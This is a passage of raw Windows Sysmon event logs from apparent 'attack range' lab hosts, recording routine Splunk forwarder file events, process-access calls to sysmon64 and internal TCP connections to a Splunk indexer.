Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=952A9E4D9847AE034D006800F0FFD208,SHA256=00FA3E0C94A900D6B7F0192D8CD82B12BD3C4D35B45F01F31B6D3DC9C8FA9D66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017122Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:23.366{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFDDBBA3366FAF9BC6020EE1A89839C9,SHA256=F9D99E5BF488D17669183FF92E60E551F95586ADB7E0B3B537F34B6683AF776A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017123Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:24.440{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=660E246E30DCDC9779DD36F149645065,SHA256=8949404EC9FCCE4E3C1EB677487FE9BC7C772E019F84550003FF7157BD04816B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:24.343{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9311A83CB4C2D29F0367AAE74DAC4D51,SHA256=A33E316C5DEC1E19EBEEBBC7809864A12141F05689B1798901AA76B70D4BF542,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:25.409{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31246043005E2392F6FCF7B4948AACB1,SHA256=B9D649D890B500B3E7DEF5E368B1A87C3CC22056C5C968C4C58927F6D910FDD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017125Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:25.655{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017124Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:25.520{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDA9231F9E22783600AD7F0AA6BF5F1E,SHA256=A36408CA8B84A090020253CED7EB14CF4CAA66BBF01CECA46EAD9291FD4EC740,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:24.682{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56387-false10.0.1.12-8000- 23542300x800000000000000044454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:26.563{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=DA0C9B14D63F0A775FB1FFC98454D675,SHA256=B15680E7874244EC03F8287738676531F46CF973180EC59A6433402BAC098142,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:26.447{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FEE6F78F1BDAEEB48339835690A5D9,SHA256=FD2FC270DB14667B877B55452DF4417EE7A532DBD29E2284BE4337DE79B1CA8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017126Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:26.608{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B2615940B99C3A0C0F9C1C0453D3B70,SHA256=B8D98E83C43D903449CE64008EA088CB3FC03C8ED194F9A4976FC40EC00593C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017128Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:26.074{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50125-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017127Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:27.692{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5A23661BE597EF389979CEFB68823BE,SHA256=5103820ABE7C07013FDA068E6F1458C9C5951945C6E24D8A55D76953DA9E492B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:27.652{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:27.481{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=186F4BBBFF5300EC4AAEE9A2A5CB29F7,SHA256=DBBFC78A5CDCE9187C875D5D12E33BAA3E17A9AE76A87C1EA044712498059EA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017129Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:28.767{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9020CD86892CC951715C6923E7130D3A,SHA256=DF83251530194F2F43FDF58655A7E32172BE7AF8D1A5CB42DB7DFF5920A24C7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.937{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4FC-63C7-5806-00000000AF02}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.934{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.934{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.934{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.934{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.934{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E4FC-63C7-5806-00000000AF02}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.934{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4FC-63C7-5806-00000000AF02}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.935{FE4C2B44-E4FC-63C7-5806-00000000AF02}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000044459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:27.127{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56388-false10.0.1.12-8089- 23542300x800000000000000044458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:28.516{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF39AD40EBA744A52597289C491F6410,SHA256=5FB8B32FABD249A26167F06DC85387059AF9C24DEBCE6011E12F6BE23D95FAC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017157Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.846{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8E0068B5DD0438368343C7CF61E4740,SHA256=794F35923F2DE08EBA3CD4B2EC4B5054DF3CB1B0F2D806D6BFB6A07E06E090FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017156Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4FD-63C7-1202-00000000B002}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017155Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017154Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017153Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017152Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017151Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017150Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017149Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017148Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 